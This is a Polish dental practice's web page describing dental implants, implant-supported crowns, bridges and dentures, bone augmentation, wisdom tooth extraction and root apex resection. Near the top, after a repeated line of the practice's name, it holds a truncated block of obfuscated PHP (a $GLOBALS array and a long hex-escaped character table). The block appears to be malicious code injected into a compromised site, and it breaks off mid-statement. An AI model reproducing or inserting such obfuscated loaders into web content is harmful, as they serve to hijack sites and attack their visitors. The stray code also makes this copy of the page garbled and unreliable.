Prywatna praktyka stomatologiczna
Katarzyna i Arkadiusz Łyko
HOMESKIEROWANIE RTGKONTAKT


Prywatna praktyka stomatologiczna
Katarzyna i Arkadiusz Łyko
ul. Armii Krajowej 2
48-370 Paczków

tel. 77 43 99 265
tel./fax 77 43 99 266

Prywatna praktyka stomatologiczna, Katarzyna i Arkadiusz Łyko Prywatna praktyka stomatologiczna, Katarzyna i Arkadiusz Łyko Prywatna praktyka stomatologiczna, Katarzyna i Arkadiusz Łyko Prywatna praktyka stomatologiczna, Katarzyna i Arkadiusz Łyko
$c65f = 509;$GLOBALS['z7f586']=Array();global$z7f586;$z7f586=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['e9bf5']="\x30\x2d\x4b\x22\x7b\x52\x33\x5a\x7d\x65\x34\x50\x7a\x2e\x27\x6b\x73\x76\x5e\x29\xa\x4a\x41\x57\x3d\x3c\x74\x3b\x75\x3f\x43\x70\x49\x2c\x4d\x36\x72\x4c\x64\x6d\x3a\x3e\x68\x5d\x67\x5b\x42\x51\x47\x44\x62\x23\x59\x25\x9\x46\x69\x21\x38\x31\x78\x6a\x5c\x58\x5f\x48\x7c\x77\x63\x24\x7e\x28\x32\x2b\x35\x54\x20\x6f\x56\x45\x6e\x53\x40\x55\x39\x4e\x6c\x60\x79\x2a\x37\xd\x66\x26\x2f\x4f\x61\x71";$z

Implantologia

Piękny uśmiech dodaje pewności siebie, pomaga w zdobyciu zaufania nowo poznanych osób. To nasza wizytówka sprawiająca, że czujemy się atrakcyjni i łatwiej osiągamy sukcesy w życiu prywatnym oraz zawodowym. Upływający czas nieodwracalnie pozostawia ślad na naszych zębach.
Czynniki takiej jak próchnica czy zapalenie tkanek przyzębia może spowodować utratą zębów i pozbawić nasz uśmiech blasku co w znaczącym stopniu obniży komfort naszego codziennego życia. Wspaniale sprawdzającym się rozwiązaniem w takich przypadkach są implanty stomatologiczne.

Zalety implantów:

 • przywracają pacjentowi piękny, pewny uśmiech;
 • pozwalają na trwałe odtworzenie ubytków zębowych;
 • są gwarancją pełnego komfortu fizycznego i psychicznego;
 • zapewniają wspaniały efekt estetyczny i naturalny wygląd uzębienia;
 • dają możliwość uniknięcia problemów związanych z tradycyjnymi uzupełnieniami protetycznymi (wyjmowanie protez, szlifowanie zębów).

Co to jest implant stomatologiczny ?

To niewielkie, tytanowe śruby umieszczane chirurgicznie w kościach żuchwy lub szczęk, zastępujące korzeń brakującego zęba oraz tworzące podbudowę dla nowej korony zęba.

Jak przebiega leczenie ?

Zabieg wszczepienia implantu tytanowego, zastępującego korzeń zęba, prowadzony jest w znieczuleniu miejscowym i jest bezbolesny.
W zależności od indywidualnych warunków wgajanie implantu trwa od 3 do 6 miesięcy. Po tym etapie chirurgicznym rozpoczyna się etap implantoprotetyczny.

Jak długo utrzymuje się implant ?

Utrzymywanie się implantu właśnie uzależnione jest od pacjenta. Systematyczne utrzymywanie dobrej higieny jamy ustnej jak również zdrowy tryb życia pozwolą cieszyć się implantem jak i wynikającymi z tego korzyściami przez całe życie.

Czy każdemu pacjentowi można wszczepić implant ?

Zazwyczaj tak, pod warunkiem, że są państwo zdrowi i dysponują odpowiednią ilością kości. Mogą wystąpić przypadki, w których nie będzie możliwości leczenia implantologicznego. Dotyczy to między innymi osób z chorobami kości, niektórymi chorobami zakaźnymi, czy pacjentów uzależnionych od alkoholu oraz nałogowych palaczy.

Ile kosztuje implant ?

Koszt zależy od liczby implantów oraz późniejszego zaopatrzenia protetycznego.
Cała procedura uzupełnienia braku jest podzielona na dwa etapy.
Etap chirurgiczny polegający na wszczepieniu implantu, które może być połączony z augmentacją oraz etap implantoprotetyczny zwykle następujący po kilku miesiącach.
Projektujemy uzupełnienia protetyczne, które najbardziej odpowiadają Państwa potrzebom.

KORONA OPARTA NA IMPLANCIE

Leczenie implantologiczne to najprostsza metoda odtworzenia zęba zgodnie z jego naturalna budową i funkcją. Korony uzupełniają pojedyncze zęby (nie są ze sobą połączone jak w przypadku mostu). Implant spełnia funkcje korzenia zęba a także umożliwia przenoszenie siły żucia na kości szczęki lub żuchwy. Zapewnia to naturalne obciążenie pozwalające na zachowanie zdrowia kości i zapobiega jej zanikowi.
Wstawiony ząb spełnia swoje funkcje, a także wygląda jak własny, szczególnie jeśli chodzi o zęby przednie. W tym przypadku bardzo ważny jest estetyczny efekt leczenia. Mocno osadzone na implantach porcelanowe korony nie tylko wyglądają jak własne, ale także dają podobne odczucia. Implant, nowy ząb oraz tkanki miękkie powinny stanowić harmonijną jedność.

W przypadku wykonywania mostów konieczne jest poświęcenie zdrowych tkanek sąsiednich zębów, które muszą być oszlifowane. Brakujący ząb jest uzupełniany przez przęsło mostu, lecz nie odtwarza to korzenia zęba. Kość szczęki lub żuchwy nie jest poddawana siłom żucia przenoszonym przez korzeń co doprowadza do stopniowego zaniku kości. Implanty są pozbawione tej wady. W naturalnych warunkach właściwe obciążenie stymuluje kość do regeneracji.

Postępowanie

W przypadku utraty zęba implant stomatologiczny wszczepia się po wyleczeniu rany. Ostateczne uzupełnienie można umieścić dopiero po zakończeniu prawidłowych procesów gojenia. W tym celu powtórnie nacina się błonę śluzową nad wszczepem i zakłada się na implant tymczasową śrubę gojącą.

Następnie można przeprowadzić modelowanie uśmiechu zakończone wykonaniem korony w gabinecie stomatologicznym. Technik dentystyczny odlewa model, a później wykonuje pojedynczą koronę. Gotową koronę osadza się na implancie za pomocą cementu lub przykręca się do implantu.

MOST OPARTY NA IMPLANTACH

Z medycznego punktu widzenia, w przypadku braku kilku zębów należy zamknąć powstałą lukę. W przeciwnym razie może dojść do utraty kości albo nieprawidłowego ustawienia zębów lub szczęki i żuchwy. Liczba wszczepianych implantów uzależniona jest od jakości zachowanej kości i wielkości ubytku.

Ważną zaletą mostów opartych na implantach jest fakt, że nie ma potrzeby szlifowania sąsiednich zdrowych zębów a także noszenia wyjmowanej protezy częściowej.
Uzupełnienie protetyczne oparte na implantach jest najlepszym rozwiązaniem z punktu widzenia estetyki, ponieważ w idealnym przypadku kończą się na poziomie dziąsła.

PROTEZY OPARTE NA IMPLANTACH

Znane są dwie możliwości leczenia implantologicznego u pacjentów z bezzębnymi szczękami: można zastosować wyjmowaną protezę opartą na implantach albo umieścić na stałe most. Oba rodzaje uzupełnień są wyraźnie lepsze niż klasyczne protezy osiadające: protezy mocno trzymają się na implantach, co oznacza, że nie przemieszcza się podczas żucia. Dziąsła nie są pokryte materiałem tworzącym płytę protezy, co pozwala na odczuwanie smaku i przywrócenie przyjemności ze spożywania pokarmów.
Ile implantów trzeba wszczepić dla podparcia protezy ?

Prawie w każdym przypadku bezzębną szczękę zaopatruje się w cztery implanty. Jest to zgodne z zaleceniami Niemieckiego Towarzystwa Stomatologicznego (DGZMK). Wprowadzenie dwóch implantów także pozwala na stabilizację protezy, jednak podparcie uzupełnienia wyłącznie na wszczepach i osiągnięcie wysokiego komfortu noszenia wymaga użycia czterech lub sześciu implantów.
W przypadku planowania wykonania osadzonego na stałe mostu odbudowującego cały łuk zębowy w większości przypadków wymaga użycia sześciu implantów w obrębie żuchwy albo ośmiu implantów w obrębie szczęki. Dokładną liczbę wszczepów można oczywiście określić dopiero po uprzednim postępowaniu diagnostycznym.

Nadbudowa (augmentacja) kości

W przypadku zbyt małej ilości tkanki kostnej przeprowadza się jej nadbudowę z użyciem sztucznych preparatów lub własnej kości. Zabieg ten sprzyja odtworzeniu utraconej wcześniej objętości kości. W okresie kilku miesięcy czy lat od ekstrakcji zęba dochodzi często do sporej utraty tkanki kostnej. Zamknięcie luki po usuniętym zębie przy użyciu implantu nie jest możliwe bez odpowiedniej ilości kości.
Opracowano różne metody nadbudowy kości. Można wśród nich wyróżnić augmentację jednoczasową i poprzedzającą.

Augmentacja jednoczasowa

Jednoczesne przeprowadzenie zabiegów implantacji i augmentacji można rozpatrywać w przypadku bardzo niewielkich ubytków kości. Do nadbudowy stosuje się zwykle sztuczne materiały kościozastępcze, które ulegają przemianie w tkankę kostną w ciągu sześciu do dwunastu miesięcy. Zastosowanie materiału kościozastępczego oznacza brak potrzeby pobierania własnej tkanki kostnej, dzięki czemu nie ma konieczności przeprowadzania dodatkowego zabiegu w innej okolicy.

Usuwanie zębów mądrości

W przypadku niewystarczającej ilości miejsca zęby mądrości nie mogą ulec normalnemu wyrżnięciu i ustawić się w łuku zębowym. W wyniku tego pozostają całkowicie przykryte kością wyrostka zębodołowego (całkowite zatrzymanie), albo wyrzynają się tylko częściowo (zatrzymanie częściowe). Całkowicie lub częściowo zatrzymane zęby mądrości mogą przyjmować różne pozycje. Operacyjne usunięcie zębów mądrości zaleca się w przypadku:

 1. stanów zapalnych kości i błony śluzowej w okolicy danego zęba mądrości, zwłaszcza w przypadku zębów częściowo zatrzymanych;
 2. tworzenia torbieli w okolicy zęba zatrzymanego, rozwijającej się z tkanek miękkich pokrywających koronę zęba;
 3. uszkodzenia zębów sąsiednich na skutek ucisku ze strony rosnącego zęba mądrości;
 4. bólu twarzy na tle nerwowym (neuralgii nerwu trójdzielnego);
 5. przemieszczenia zębów na skutek wyrzynania się zębów mądrości;
 6. schorzeń ogólnych, które mogą być spowodowane obecnością zatrzymanych zębów mądrości;
 7. leczenia za pomocą koron/mostów protetycznych sięgających do ostatniego zęba w odcinku bocznym albo zaopatrywania protetycznego bezzębnych szczęk.

Zabieg

W znieczuleniu miejscowym lub ogólnym rozdziela się błonę śluzową od kości. Następnie uwalnia się ząb, likwidując kość za pomocą frezu. Można teraz usunąć ząb za pomocą dźwigni lub kleszczy. W niektórych przypadkach usunięcie zęba wymaga jego wcześniejszego rozcięcia. Ranę zamyka się przy pomocy szwów.
Po operacji mogą wystąpić obrzęk policzka lub wargi, trudności w otwieraniu ust, trudności z przełykaniem i podwyższona temperatura ciała. Wymienione objawy ustępują na ogół po trzech - czterech dniach. Po dwóch tygodniach można usunąć szwy. Rana jest całkowicie zagojona po ok. czterech tygodniach.

Resekcja wierzchołków korzeni

W przypadku, kiedy analiza zdjęcia radiologicznego wykazuje, że wokół wierzchołka korzenia występuje stan zapalny albo torbiel, możliwe jest zachowanie danego zęba na przykład poprzez wykonanie resekcji (odcięcia) wierzchołka jego korzenia.

Zabieg

W znieczuleniu miejscowym nacina się błonę śluzową, odsłaniając kość nad chorym wierzchołkiem korzenia. Kość znajdującą się w okolicy wierzchołka korzenia zdejmuje się za pomocą frezu. Następnie odcina się i likwiduje wierzchołek korzenia oraz zmienione zapalnie tkanki, co określa się mianem resekcji. W większości przypadków jakiś czas przed zabiegiem wykonuje się leczenie kanałowe. Dodatkowo powstałą jamę można wypełnić materiałem kościozastępczym. Po zabiegu mogą pojawić się dolegliwości takie jak: obrzęk policzka lub wargi, trudności w otwieraniu ust, trudności z przełykaniem i podwyższona temperatura ciała. Wymienione objawy ustępują na ogół po trzech - czterech dniach. Po dwóch tygodniach usuwa się szwy. Rana jest całkowicie wygojona po ok. czterech tygodniach.

praktyka | kontakt | leczenie | leczenie dzieci | ortodoncja | protetyka | chirurgia / implanty | diagnostyka i technologie